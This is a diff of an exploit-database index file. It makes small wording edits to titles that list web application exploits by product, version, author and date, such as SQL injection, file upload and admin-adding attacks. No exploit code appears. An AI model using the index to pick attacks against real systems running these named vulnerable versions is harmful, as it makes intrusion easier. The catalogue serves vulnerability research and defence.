@ -18540,8 +18544,8 @@ id,file,description,date,author,platform,type,port
 5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,php,webapps,0
 5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' Parameter SQL Injection",2008-03-06,S@BUN,php,webapps,0
 5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' Parameter SQL Injection",2008-03-06,S@BUN,php,webapps,0
-5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 - Remote Add Admin",2008-03-07,"Charles Fol",php,webapps,0
-5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Arbitrary File Upload",2008-03-07,"Charles Fol",php,webapps,0
+5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 < 2.3 - Remote Add Admin",2008-03-07,"Charles Fol",php,webapps,0
+5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 < 2.3 - Arbitrary File Upload",2008-03-07,"Charles Fol",php,webapps,0
 5221,platforms/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - 'cid' Parameter SQL Injection",2008-03-08,S@BUN,php,webapps,0
 5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - 'qti_usr.php' SQL Injection",2008-03-09,croconile,php,webapps,0
 5223,platforms/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps,0
@ -18988,7 +18992,7 @@ id,file,description,date,author,platform,type,port
 5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting",2008-06-12,"CWH Underground",php,webapps,0
 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0
 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0
-5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection",2008-06-12,TheDefaced,php,webapps,0
+5796,platforms/php/webapps/5796.php,"GLLCTS2 < 4.2.4 - 'detail' Parameter SQL Injection",2008-06-12,TheDefaced,php,webapps,0
 5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting",2008-06-13,"CWH Underground",php,webapps,0
 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",php,webapps,0
 5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0
@ -19246,7 +19250,7 @@ id,file,description,date,author,platform,type,port
 6086,platforms/php/webapps/6086.txt,"Joomla! Component DT Register - SQL Injection",2008-07-16,His0k4,php,webapps,0
 6087,platforms/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - 'pgm' Parameter SQL Injection",2008-07-16,"Hussin X",php,webapps,0
 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injections",2008-07-16,Mr.SQL,php,webapps,0
-6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - 'viewCat' Parameter SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
+6091,platforms/php/webapps/6091.txt,"PHPHoo3 < 5.2.6 - 'viewCat' Parameter SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
 6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - 'UID' Parameter SQL Injection",2008-07-17,"Hussin X",php,webapps,0
 6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0
 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
@ -19325,7 +19329,7 @@ id,file,description,date,author,platform,type,port
 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0
 6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - SQL Injection / Arbitrary File Upload / Information Gathering",2008-08-02,"Khashayar Fereidani",php,webapps,0
 6192,platforms/php/webapps/6192.txt,"k-links directory - SQL Injection / Cross-Site Scripting",2008-08-02,Corwin,php,webapps,0
-6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 <= 2 PayPal Edition - 'pid' Parameter SQL Injection",2008-08-02,Mr.SQL,php,webapps,0
+6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 < 2 PayPal Edition - 'pid' Parameter SQL Injection",2008-08-02,Mr.SQL,php,webapps,0
 6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0
 6199,platforms/php/webapps/6199.pl,"Joomla! Component EZ Store Remote - Blind SQL Injection",2008-08-03,His0k4,php,webapps,0
 6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 - 'index.php' Local File Inclusion",2008-08-03,SirGod,php,webapps,0
@ -19341,7 +19345,7 @@ id,file,description,date,author,platform,type,port
 6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0
 6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - 'searchid' Parameter SQL Injection",2008-08-06,james,php,webapps,0
 6215,platforms/php/webapps/6215.txt,"pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting",2008-08-10,BeyazKurt,php,webapps,0
-6219,platforms/php/webapps/6219.txt,"e107 <= 0.7.11 - Arbitrary Variable Overwriting",2008-08-10,"GulfTech Security",php,webapps,0
+6219,platforms/php/webapps/6219.txt,"e107 < 0.7.11 - Arbitrary Variable Overwriting",2008-08-10,"GulfTech Security",php,webapps,0
 6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' Parameter SQL Injection",2008-08-10,CraCkEr,php,webapps,0
 6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - SQL Injection",2008-08-10,irk4z,php,webapps,0
 6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final - 'startup.php' Remote File Inclusion",2008-08-10,CraCkEr,php,webapps,0
@ -19746,7 +19750,7 @@ id,file,description,date,author,platform,type,port
 6788,platforms/php/webapps/6788.txt,"Yappa-ng 2.3.3-beta0 - 'album' Parameter Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0
 6789,platforms/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0
 6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0
-6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection",2008-10-19,girex,php,webapps,0
+6791,platforms/php/webapps/6791.pl,"e107 < 0.7.13 - 'usersettings.php' Blind SQL Injection",2008-10-19,girex,php,webapps,0
 6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection",2008-10-20,boom3rang,php,webapps,0
 6795,platforms/php/webapps/6795.txt,"XOOPS Module makale 0.26 - SQL Injection",2008-10-20,EcHoLL,php,webapps,0
 6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0
@ -20082,8 +20086,8 @@ id,file,description,date,author,platform,type,port
 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0
 7208,platforms/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - 'ad_id' Parameter SQL Injection",2008-11-24,"Hussin X",php,webapps,0
 7210,platforms/php/webapps/7210.txt,"Goople CMS 1.7 - Arbitrary Code Execution",2008-11-24,x0r,php,webapps,0
-7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0
-7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0
+7211,platforms/php/webapps/7211.php,"VideoScript 3.0 < 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0
+7212,platforms/php/webapps/7212.php,"VideoScript 3.0 < 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0
 7214,platforms/php/webapps/7214.txt,"ftpzik - Cross-Site Scripting / Local File Inclusion",2008-11-24,JIKO,php,webapps,0
 7215,platforms/php/webapps/7215.txt,"Bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0
 7216,platforms/php/webapps/7216.txt,"WebStudio CMS - Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0
@ -20210,7 +20214,7 @@ id,file,description,date,author,platform,type,port
 7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0
 7361,platforms/asp/webapps/7361.txt,"ASP PORTAL - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0
 7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - '_language' Parameter Local File Inclusion",2008-12-06,dun,php,webapps,0
-7364,platforms/php/webapps/7364.php,"IPNPro3 <= 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
+7364,platforms/php/webapps/7364.php,"IPNPro3 < 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
 7365,platforms/php/webapps/7365.php,"DL PayCart 1.34 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
 7366,platforms/php/webapps/7366.php,"Bonza Cart 1.10 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
 7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Change",2008-12-07,G4N0K,php,webapps,0
@ -20437,7 +20441,7 @@ id,file,description,date,author,platform,type,port
 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0
 7653,platforms/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,php,webapps,0
 7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Parameter Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
-7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
+7658,platforms/php/webapps/7658.pl,"PNPHPBB2 < 1.2i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' Parameter SQL Injection",2009-01-04,DaiMon,php,webapps,0
 7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - 'index.php id' SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0
 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0
@ -20630,7 +20634,7 @@ id,file,description,date,author,platform,type,port
 7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - Authentication Bypass",2009-02-03,x0r,php,webapps,0
 7959,platforms/php/webapps/7959.txt,"Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing",2009-02-03,Xianur0,php,webapps,0
 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps,0
-7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - 'photo.php id' Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
+7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - 'id' Parameter Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
 7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0
 7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0
 7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
@ -20923,7 +20927,7 @@ id,file,description,date,author,platform,type,port
 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,php,webapps,0
 8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0
-8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0
+8495,platforms/php/webapps/8495.pl,"e107 < 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0
 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
 8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - Authentication Bypass",2009-04-20,"Salvatore Fresta",php,webapps,0
 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps,0
@ -21842,8 +21846,8 @@ id,file,description,date,author,platform,type,port
 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-12-07,"Amol Naik",php,webapps,0
 10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold - Persistent Cross-Site Scripting",2009-12-08,mr_me,php,webapps,0
 10356,platforms/php/webapps/10356.txt,"Joomla! Component com_job - (showMoreUse) SQL Injection",2009-12-08,Palyo34,php,webapps,0
-10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
-10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
+10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 < 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
+10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 < 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
 10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - Authentication Bypass",2009-12-09,"AnTi SeCuRe",php,webapps,0
 10364,platforms/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple Cross-Site Scripting / Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps,0
 10366,platforms/php/webapps/10366.txt,"Joomla! Component com_jsjobs 1.0.5.6 - SQL Injection",2009-12-10,kaMtiEz,php,webapps,0
@ -23589,7 +23593,7 @@ id,file,description,date,author,platform,type,port
 14062,platforms/php/webapps/14062.txt,"Joomla! Component 'jeeventcalendar' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
 14063,platforms/php/webapps/14063.txt,"Joomla! Component com_jejob - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
 14064,platforms/php/webapps/14064.txt,"Joomla! Component jesectionfinder - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
-14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
+14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - 'smartresult.php' SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
 14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps,0
 14074,platforms/php/webapps/14074.rb,"2DayBiz ybiz Polls Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
 14075,platforms/php/webapps/14075.rb,"2DayBiz ybiz Freelance Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
@ -24228,7 +24232,7 @@ id,file,description,date,author,platform,type,port
 15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - 'viewver.php' Remote File Inclusion",2010-11-18,FL0RiX,php,webapps,0
 15568,platforms/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0
 15570,platforms/php/webapps/15570.php,"Joomla! Component 'com_mtree' 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps,0
-15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
+15571,platforms/php/webapps/15571.txt,"Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 15572,platforms/php/webapps/15572.txt,"ViArt Shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0
 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,php,webapps,0
 15574,platforms/php/webapps/15574.txt,"Arabian YouTube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0
@ -24923,7 +24927,7 @@ id,file,description,date,author,platform,type,port
 17714,platforms/php/webapps/17714.txt,"Help Desk Software 1.1g - Cross-Site Request Forgery (Add Admin)",2011-08-24,G13,php,webapps,0
 17716,platforms/php/webapps/17716.txt,"WordPress Plugin SendIt 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,php,webapps,0
 17720,platforms/php/webapps/17720.txt,"WordPress Plugin Photoracer 1.0 - SQL Injection",2011-08-26,evilsocket,php,webapps,0
-17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution (Metasploit)",2011-08-26,"Aung Khant",php,webapps,0
+17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 < 5.2 - Arbitrary Code Execution (Metasploit)",2011-08-26,"Aung Khant",php,webapps,0
 17724,platforms/php/webapps/17724.txt,"WordPress Plugin Js-appointment 1.5 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0
 17725,platforms/php/webapps/17725.txt,"WordPress Plugin MM Forms Community 1.2.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0
 17728,platforms/php/webapps/17728.txt,"WordPress Plugin Super CAPTCHA 2.2.4 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0
@ -25029,7 +25033,7 @@ id,file,description,date,author,platform,type,port
 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0
 17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite - reGenerateReports Stored procedure SQL Injection (Metasploit)",2011-10-02,Metasploit,cgi,webapps,0
 17924,platforms/jsp/webapps/17924.pl,"JBoss & JMX Console - Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps,0
-17925,platforms/php/webapps/17925.txt,"Concrete5 <= 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0
+17925,platforms/php/webapps/17925.txt,"Concrete5 < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0
 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps,0
 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0
 18033,platforms/php/webapps/18033.txt,"Joomla! Component 'com_yjcontactus' - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
@ -25098,7 +25102,7 @@ id,file,description,date,author,platform,type,port
 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0
 18063,platforms/php/webapps/18063.txt,"BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0
 18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - (loggedInUser) SQL Injection",2011-11-02,LiquidWorm,php,webapps,0
-18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x / <= 3.70) Classic 3.01 - Local File Inclusion",2011-11-02,"Rami Salama",php,webapps,0
+18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x < 3.70) Classic 3.01 - Local File Inclusion",2011-11-02,"Rami Salama",php,webapps,0
 18069,platforms/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0
 18070,platforms/php/webapps/18070.txt,"Web File Browser 0.4b14 - File Download",2011-11-03,"Sangyun YOO",php,webapps,0
 18075,platforms/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution",2011-11-04,EgiX,php,webapps,0
@ -25196,7 +25200,7 @@ id,file,description,date,author,platform,type,port
 19381,platforms/php/webapps/19381.php,"SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution",2012-06-23,EgiX,php,webapps,0
 18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0
 18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0
-18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0
+18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 < 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0
 18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0
 18335,platforms/php/webapps/18335.txt,"MangosWeb - SQL Injection",2012-01-08,Hood3dRob1n,php,webapps,0
 18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps,0
@ -25862,7 +25866,7 @@ id,file,description,date,author,platform,type,port
 21532,platforms/cgi/webapps/21532.txt,"CGIScript.net csNews 1.0 - Double URL Encoding Unauthorized Administrative Access",2002-06-11,"Steve Gustin",cgi,webapps,0
 21533,platforms/cgi/webapps/21533.txt,"CGIScript.net csNews 1.0 - Header File Type Restriction Bypass",2002-06-11,"Steve Gustin",cgi,webapps,0
 21535,platforms/cgi/webapps/21535.txt,"MakeBook 2.2 - Form Field Input Validation",2002-06-12,b0iler,cgi,webapps,0
-21543,platforms/java/webapps/21543.txt,"Ruslan Communications <Body>Builder - SQL Injection",2002-06-13,"Alexander Korchagin",java,webapps,0
+21543,platforms/java/webapps/21543.txt,"Ruslan Communications <Body>Builder - Authentication Bypass",2002-06-13,"Alexander Korchagin",java,webapps,0
 21545,platforms/jsp/webapps/21545.txt,"JAMF Casper Suite MDM - Cross-Site Request Forgery",2012-09-27,"Jacob Holcomb",jsp,webapps,0
 21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection",2012-09-27,otoy,windows,webapps,0
 21552,platforms/php/webapps/21552.txt,"PHP Classifieds 6.0.5 - Cross-Site Scripting",2002-06-14,windows-1256,php,webapps,0
@ -26613,8 +26617,8 @@ id,file,description,date,author,platform,type,port
 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0
 23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0
 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - 'info.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
-23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
-23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
+23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x - 'info.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
+23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - 'footer.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
 23702,platforms/asp/webapps/23702.txt,"ProductCart 1.x/2.x - Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps,0
 23703,platforms/asp/webapps/23703.txt,"ProductCart 1.x/2.x - advSearch_h.asp Multiple Parameter SQL Injection",2004-02-16,"Nick Gudov",asp,webapps,0
 23704,platforms/asp/webapps/23704.txt,"ProductCart 1.x/2.x - Custva.asp redirectUrl Parameter Cross-Site Scripting",2004-02-16,"Nick Gudov",asp,webapps,0
@ -26646,7 +26650,7 @@ id,file,description,date,author,platform,type,port
 23773,platforms/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 - Cross-Site Scripting",2004-03-01,"David Sopas Ferreira",php,webapps,0
 23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0
 23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple Parameter SQL Injection",2004-03-01,"Alnitak and BackSpace",php,webapps,0
-23781,platforms/php/webapps/23781.txt,"MyBB - 'editpost.php posthash' SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0
+23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php posthash' Time Based SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0
 23782,platforms/php/webapps/23782.txt,"Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0
 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0
 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter Cross-Site Scripting",2004-04-23,waraxe,php,webapps,0
@ -27388,7 +27392,7 @@ id,file,description,date,author,platform,type,port
 25236,platforms/php/webapps/25236.html,"PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities",2005-03-18,"PersianHacker Team",php,webapps,0
 25237,platforms/php/webapps/25237.txt,"RunCMS 1.1 - Database Configuration Information Disclosure",2005-03-18,"Majid NT",php,webapps,0
 25239,platforms/php/webapps/25239.txt,"CoolForum 0.5/0.7/0.8 - avatar.php img Parameter Cross-Site Scripting",2005-03-19,Romano,php,webapps,0
-25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 - register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0
+25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 - 'register.php' login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0
 25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 - 'Setuser.php' HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0
 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 - Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0
 40397,platforms/aspx/webapps/40397.txt,"MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities",2016-09-19,"Paul Baade and Sven Krewitt",aspx,webapps,0
@ -27788,7 +27792,7 @@ id,file,description,date,author,platform,type,port
 33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory Draperi",php,webapps,80
 25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 - IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",php,webapps,0
 25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0
-25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0
+25779,platforms/php/webapps/25779.txt,"MyBulletinBoard (MyBB) RC4 - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0
 25780,platforms/asp/webapps/25780.txt,"JiRo's Upload System 1.0 - 'login.asp' SQL Injection",2005-06-01,Romty,asp,webapps,0
 25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site - 'login.asp' SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps,0
 25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 - 'login.asp' SQL Injection",2005-06-01,"Dj romty",asp,webapps,0
@ -29275,7 +29279,7 @@ id,file,description,date,author,platform,type,port
